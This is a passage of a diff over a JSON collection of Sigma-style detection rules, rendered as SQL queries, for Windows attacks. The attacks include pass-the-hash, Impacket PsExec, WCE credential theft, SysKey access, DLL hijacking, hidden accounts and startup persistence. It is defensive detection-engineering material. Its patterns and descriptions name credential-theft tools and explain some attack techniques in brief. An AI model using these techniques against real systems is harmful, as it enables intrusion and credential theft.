OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "status": "test", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", - "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "status": "test", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_pcap_drivers.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" - ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" - }, - { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", - "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "User using a disabled account" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * 